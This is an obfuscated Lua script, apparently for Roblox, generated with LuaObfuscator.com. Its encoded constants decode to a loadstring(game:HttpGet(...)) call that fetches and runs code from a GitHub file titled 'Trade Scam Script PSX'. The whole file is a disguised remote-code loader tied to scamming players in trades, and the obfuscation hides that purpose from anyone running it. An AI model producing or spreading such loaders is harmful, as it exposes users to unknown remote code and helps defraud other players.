--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.4) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==3) then v24=nil;v24=function()local v39=0 + 0 ;local v40;local v41;local v42;local v43;while true do if (v39==(1073 -(137 + 936))) then v40,v41,v42,v43=v1(v16,v19,v19 + 2 + 1 );v19=v19 + (571 -(192 + 375)) ;v39=(1 -0) + 0 ;end if ((1 + 0)==v39) then return (v43 * 16777216) + (v42 * (162233 -96697)) + (v41 * (128 + 128)) + v40 ;end end end;v25=nil;v18=4;end if (v18==6) then v29=nil;v29=function()local v44=0;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v44~=(971 -(890 + 77))) then else while true do if (v45==(10 -7)) then v52=nil;while true do local v105=1778 -(1307 + 471) ;local v106;local v107;while true do if (1~=v105) then else while true do if (0==v106) then v107=0 + 0 ;while true do if (v107==(142 -(117 + 25))) then local v116=0 + 0 ;local v117;while true do if (v116~=0) then else v117=0 + 0 ;while true do if (v117==(1 + 0)) then v107=1;break;end if (v117==0) then if (v46==3) then local v143=810 -(13 + 797) ;while true do local v147=0 -0 ;while true do if (v147==0) then if (v143==(0 + 0)) then local v161=0;while true do if (v161==(0 -0)) then for v171=382 -(75 + 306) ,v24() do v48[v171-1 ]=v29();end for v173=1 + 0 ,v24() do v49[v173]=v24();end v161=1072 -(68 + 1003) ;end if (1~=v161) then else v143=1 -0 ;break;end end end if (v143~=1) then else return v50;end break;end end end end if (v46~=0) then else local v144=0;local v145;while true do if (v144==0) then v145=0 -0 ;while true do if (v145~=0) then else v47={};v48={};v145=1;end if (1~=v145) then else v49={};v46=1;break;end end break;end end end v117=1;end end break;end end end if (1==v107) then if (v46~=(1508 -(267 + 1239))) then else local v118=0;local v119;local v120;while true do if (v118==1) then while true do if (v119==0) then v120=0 -0 ;while true do if (v120==0) then local v148=0 -0 ;while true do if (v148==(0 -0)) then for v167=1454 -(73 + 1380) ,v51 do local v168=0;local v169;local v170;while true do if (v168~=(0 + 0)) then else local v175=0 + 0 ;while true do if (v175==1) then v168=2 -1 ;break;end if (0~=v175) then else v169=v22();v170=nil;v175=1;end end end if (v168~=(2 -1)) then else if (v169==(1 + 0)) then v170=v22()~=0 ;elseif (v169==2) then v170=v25();elseif (v169~=(5 -2)) then else v170=v26();end v52[v167]=v170;break;end end end v50[3]=v22();v148=1 -0 ;end if (v148~=(2 -1)) then else v120=1;break;end end end if (v120==1) then for v154=1,v24() do local v155=0 + 0 ;local v156;local v157;while true do if ((1527 -(520 + 1007))~=v155) then else v156=0;v157=nil;v155=1;end if ((3 -2)==v155) then while true do if (v156==(0 -0)) then v157=v22();if (v21(v157,1 -0 ,1)~=(0 -0)) then else local v179=0 -0 ;local v180;local v181;local v182;local v183;while true do if (2==v179) then while true do if (v180~=(493 -(231 + 262))) then else v181=v21(v157,2,3);v182=v21(v157,740 -(440 + 296) ,9 -3 );v180=954 -(653 + 300) ;end if (v180==(1 + 0)) then local v184=0;local v185;while true do if (v184==0) then v185=0;while true do if (v185==(763 -(687 + 75))) then v180=2;break;end if (v185==(1228 -(209 + 1019))) then local v193=0 + 0 ;while true do if (v193~=(592 -(8 + 584))) then else v183={v23(),v23(),nil,nil};if (v181==(0 -0)) then local v194=0 + 0 ;local v195;while true do if (v194==0) then v195=0;while true do if (v195==0) then v183[2 + 1 ]=v23();v183[4]=v23();break;end end break;end end elseif (v181==1) then v183[2 + 1 ]=v24();elseif (v181==(1275 -(954 + 319))) then v183[3]=v24() -(2^(13 + 3)) ;elseif (v181~=3) then else local v200=0;local v201;while true do if (v200==0) then v201=0 -0 ;while true do if (v201==(0 + 0)) then v183[3]=v24() -((1611 -(1202 + 407))^16) ;v183[9 -5 ]=v23();break;end end break;end end end v193=1 -0 ;end if (v193~=1) then else v185=1 + 0 ;break;end end end end break;end end end if (v180~=3) then else if (v21(v182,3,3)==(475 -(341 + 133))) then v183[8 -4 ]=v52[v183[4]];end v47[v154]=v183;break;end if ((1671 -(1152 + 517))==v180) then if (v21(v182,1,2 -1 )~=(2 -1)) then else v183[2]=v52[v183[357 -(337 + 18) ]];end if (v21(v182,1 + 1 ,2)==(1848 -(1728 + 119))) then v183[3]=v52[v183[3 + 0 ]];end v180=7 -4 ;end end break;end if (v179~=(2 -1)) then else v182=nil;v183=nil;v179=2;end if (v179~=(0 + 0)) then else v180=0;v181=nil;v179=4 -3 ;end end end break;end end break;end end end v46=3;break;end end break;end end break;end if (v118~=0) then else v119=0;v120=nil;v118=2 -1 ;end end end if (1==v46) then local v121=0;local v122;while true do if (v121~=(328 -(138 + 190))) then else v122=0 -0 ;while true do if (0==v122) then local v146=0;while true do if (v146==0) then v50={v47,v48,nil,v49};v51=v24();v146=1;end if (v146~=1) then else v122=1;break;end end end if (v122==(3 -2)) then v52={};v46=2 + 0 ;break;end end break;end end end break;end end break;end end break;end if (v105==(0 -0)) then v106=1735 -(1000 + 735) ;v107=nil;v105=2 -1 ;end end end break;end if (v45~=(0 + 0)) then else local v97=308 -(59 + 249) ;while true do if ((0 -0)~=v97) then else v46=879 -(27 + 852) ;v47=nil;v97=1;end if (v97==(1979 -(38 + 1940))) then v45=1;break;end end end if (v45==(1 + 0)) then local v98=0;while true do if (v98~=(1 + 0)) then else v45=426 -(292 + 132) ;break;end if (v98~=(0 + 0)) then else v48=nil;v49=nil;v98=1;end end end if (v45~=(2 + 0)) then else v50=nil;v51=nil;v45=1853 -(412 + 1438) ;end end break;end if (v44~=(1548 -(1251 + 296))) then else v47=nil;v48=nil;v44=2;end if (v44==(514 -(232 + 280))) then v49=nil;v50=nil;v44=3;end if (v44==(0 + 0)) then v45=0;v46=nil;v44=1;end if (v44==(1679 -(1112 + 564))) then v51=nil;v52=nil;v44=829 -(78 + 747) ;end end end;v30=nil;v18=7;end if (v18==2) then v22=function()local v53=0;local v54;while true do if ((1 + 0)==v53) then return v54;end if (v53==(0 -0)) then v54=v1(v16,v19,v19);v19=v19 + ((1224 + 761) -(1852 + 132)) ;v53=1 + 0 ;end end end;v23=nil;v23=function()local v55=0 -(63 -(38 + 25)) ;local v56;local v57;while true do if (v55==1) then return (v57 * (190 + 66)) + v56 ;end if (v55==(0 -0)) then v56,v57=v1(v16,v19,v19 + (1253 -(649 + 602)) );v19=v19 + 1 + 1 ;v55=1 + 0 ;end end end;v18=3;end if (v18==5) then v27=v24;v28=nil;v28=function(...)return {...},v12("#",...);end;v18=6;end if (v18==7) then v30=function(v31,v32,v33)local v58=v31[1];local v59=v31[2];local v60=v31[3];return function(...)local v70=0;local v71;local v72;local v73;local v74;local v75;while true do if (v70==1) then v73={...};v74=v12("#",...) -1 ;v70=2;end if (v70==3) then A,B=v28(v11(v75));if  not A[1] then local v99=0;local v100;while true do if (v99==0) then v100=v31[4][v71] or "?" ;error("Script error at ["   .. v100   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end break;end if (v70==2) then v75=nil;v75=function()local v86=v58;local v87=v59;local v88=v60;local v89=v28;local v90={};local v91={};local v92={};for v101=1463 -(537 + 926) ,v74 do if (((7629 -4991)>(602 + 1182 + 72)) and (v101>=v88)) then v90[v101-v88 ]=v73[v101 + 1 ];else v92[v101]=v73[v101 + (498 -(51 + (2101 -(1415 + 240)))) ];end end local v93=(v74-v88) + 1 + 0 ;local v94;local v95;while true do local v102=0 + 0 ;local v103;local v104;while true do if ((v102==(0 -0)) or (2410<1655)) then v103=(1878 -663) -(1194 + 21) ;v104=nil;v102=1 -0 ;end if (((8189 -6022)<(5912 -1914)) and (v102==(2 -1))) then while true do if ((0==v103) or ((4548 -1082)>4292)) then v104=0 -(0 -0) ;while true do if ((v104==((286 -(226 + 60)) -0)) or ((1511 -(330 + (1073 -(528 + 199))))<=(1128 -(262 + 276)))) then local v114=1418 -(297 + 1121) ;local v115;while true do if (((4687 + 101)==(3824 + 964)) and (v114==(0 -0))) then v115=0;while true do if ((4900>=3463) and ((404 -(210 + 193 + 0))==v115)) then v104=930 -(754 + (619 -(100 + 344))) ;break;end if ((4735==4735) and (v115==(0 + 0))) then v94=v86[v71];v95=v94[2 -1 ];v115=3 -2 ;end end break;end end end if ((((493 + 538) -(272 + 46))>=(1489 -(153 + 1255))) and ((1842 -(601 + 1240))==v104)) then if ((4372>=2819) and (v95<=(2 + 0))) then if ((v95<=((0 -0) + 0)) or ((2416 -(11 + 247))<=(17 + 16))) then v92[v94[(585 -(54 + 530)) + 1 ]]=v33[v94[2 + 1 ]];elseif (((1491 + 59)>=(3352 -(155 + 1759))) and (v95==(324 -(130 + 193)))) then v92[v94[1872 -(412 + 1458) ]]=v94[1798 -(1672 + 123) ];else local v129=377 -(288 + 89) ;local v130;local v131;local v132;while true do if (((3799 -(1613 + 193))<((9698 -(1044 + 15)) -4987)) and (v129==1)) then v132=nil;while true do if (((19355 -14402)>(12612 -8279)) and (v130==1)) then v92[v131 + 1 + 0 ]=v132;v92[v131]=v132[v94[4]];break;end if (((6175 -3479)>(967 -618)) and (((1611 -(654 + 957)) -0)==v130)) then local v152=0;while true do if ((v152==1) or (((2642 + 306) -(278 + 357))>=(4449 -(797 + 255)))) then v130=1 + 0 ;break;end if ((v152==0) or (((7757 -(929 + 733)) -(335 + 849))==(4135 -(1102 + 32)))) then v131=v94[1426 -(1305 + 119) ];v132=v92[v94[(7 -3) -1 ]];v152=1 -0 ;end end end end break;end if ((v129==(0 -0)) or (807>(1539 + 179))) then v130=0 + 0 ;v131=nil;v129=1 + 0 ;end end end elseif ((((6183 -(457 + 1015)) -(294 + 996))>=(2000 -(1073 + 211))) and (v95<=(2 + 2))) then if (((3131 -(1766 + 112))<2120) and (v95>(2 + 1))) then v92[v94[2]]();else local v133=0;local v134;local v135;local v136;while true do if ((v133==0) or (3435<(679 + 996))) then v134=0 -0 ;v135=nil;v133=4 -3 ;end if ((v133==(1 -0)) or ((2917 + 780)>=(2190 + 2420))) then v136=nil;while true do if ((v134==1) or ((21440 -17013)>(4278 + 614))) then while true do if ((1882<=(10301 -7443)) and (v135==(668 -(568 + 100)))) then v136=v94[1 + 1 ];v92[v136]=v92[v136](v13(v92,v136 + (2 -1) ,v72));break;end end break;end if ((v134==(0 + 0)) or ((9917 -5006)<=(863 + 490))) then v135=(4350 -2780) -(1437 + 133) ;v136=nil;v134=1 + 0 ;end end break;end end end elseif ((v95==(2 + 3)) or (((2593 -(447 + 102)) + 313)>(2080 + 496))) then do return;end else local v137=1812 -(884 + 928) ;local v138;local v139;local v140;local v141;local v142;while true do if ((v137==(139 -(28 + 110))) or (1816>=(10934 -8610))) then v140=nil;v141=nil;v137=1 + 1 ;end if (((1507 -1171)<=((2987 -(1261 + 189)) -(750 + 22))) and ((1942 -(1176 + 764))==v137)) then v142=nil;while true do if ((((3402 -(97 + 428)) -(430 + 668))<=(4284 -(117 + 348))) and (v138==(289 -(125 + 162)))) then for v158=v139,v72 do local v159=0;local v160;while true do if (((0 -0)==v159) or (574>=((3712 -1043) -(106 + 35)))) then v160=0 -0 ;while true do if (((370 -(227 + 129 + 14))==v160) or ((10623 -6798)<=(114 + 12))) then v142=v142 + 1 + 0 ;v92[v158]=v140[v142];break;end end break;end end end break;end if (((1 + (0 -0))==v138) or ((4000 -(467 + 1091))>2866)) then v72=(v141 + v139) -(2 -1) ;v142=872 -(38 + 834) ;v138=2;end if ((1334<=4936) and (v138==0)) then v139=v94[399 -(182 + 215) ];v140,v141=v89(v92[v139](v13(v92,v139 + 1 ,v94[3])));v138=2 -(1021 -(656 + 364)) ;end end break;end if (((2788 -(6 + 478))>=(968 -(206 + (294 -152)))) and (v137==((0 + 0) -0))) then v138=0 + 0 ;v139=nil;v137=1917 -(1275 + 641) ;end end end v71=v71 + (1357 -(343 + 1013)) ;break;end end break;end end break;end end end end;v70=3;end if (v70==0) then v71=1;v72= -1;v70=1;end end end;end;return v30(v29(),{},v17)(...);end if (v18==4) then v25=function()local v61=v24();local v62=v24();local v63=258 -(173 + 84) ;local v64=(v21(v62,1 -0 ,52 -32 ) * ((1 + 1 + 0)^((892 -(682 + 207)) + (1205 -(768 + 408))))) + v61 ;local v65=v21(v62,21,1587 -(1025 + 531) );local v66=((v21(v62,123 -91 )==(1576 -(431 + 1144))) and  -((1435 -(53 + 179)) -(815 + 387))) or (1 + 0) ;if (v65==0) then if (v64==(0 -0)) then return v66 * (0 -0) ;else local v83=0 + 0 ;while true do if (v83==(0 -0)) then v65=(234 + 1521) -(1547 + 207) ;v63=0 + 0 ;break;end end end elseif (v65==2047) then return ((v64==0) and (v66 * (1/(1543 -(715 + 828))))) or (v66 * NaN) ;end return v8(v66,v65-(458 + (920 -355)) ) * (v63 + (v64/(2^(129 -77)))) ;end;v26=nil;v26=function(v34)local v67=(1738 -(876 + 862)) -0 ;local v68;local v69;while true do if (v67==(12 -(9 + 0))) then return v6(v69);end if (v67==0) then v68=nil;if  not v34 then local v96=982 -(562 + 420) ;while true do if ((0 + 0)==v96) then v34=v24();if (v34==(0 -0)) then return "";end break;end end end v67=1162 -(856 + 305) ;end if (v67==(6 -4)) then v69={};for v84=1 + 0 , #v68 do v69[v84]=v2(v1(v3(v68,v84,v84)));end v67=1 + 2 ;end if (v67==1) then v68=v3(v16,v19,(v19 + v34) -(1 + 0) );v19=v19 + v34 ;v67=2;end end end;v18=5;end if (v18==1) then v21=nil;v21=function(v35,v36,v37)if v37 then local v76=0 + 0 ;local v77;while true do if (v76==(0 + 0)) then v77=(v35/(((752 -(616 + 134)) + 0)^(v36-(3 -2))))%((1899 -(922 + 975))^(((v37-(3 -2)) -(v36-(1 + 0 + 0))) + (1240 -(385 + 854)))) ;return v77-(v77%(1987 -(1096 + 788 + 102))) ;end end else local v78=39 -(37 + 2) ;local v79;while true do if (0==v78) then v79=(1390 -(1032 + 356))^(v36-(1 + 0)) ;return (((v35%(v79 + v79))>=v79) and (1 + 0)) or (0 + 0) ;end end end end;v22=nil;v18=2;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then local v80=0;while true do if (v80==0) then v20=v0(v3(v38,1,1));return "";end end else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v38,16));if v20 then local v108=0;local v109;while true do if (v108==0) then v109=v5(v82,v20);v20=nil;v108=1;end if (v108==1) then return v109;end end else return v82;end break;end end end end);v18=1;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403553O00682O7470733A2O2F6769746875622E636F6D2F4A6F686E75747A546172616E752F54726164652D5363616D2D5073782F626C6F622F6D61696E2F54726164652532305363616D25323053637269707425323050535800083O00124O00013O00122O000100023O002002000100010003001201000300044O0006000100034O00035O00022O00043O000100012O00053O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
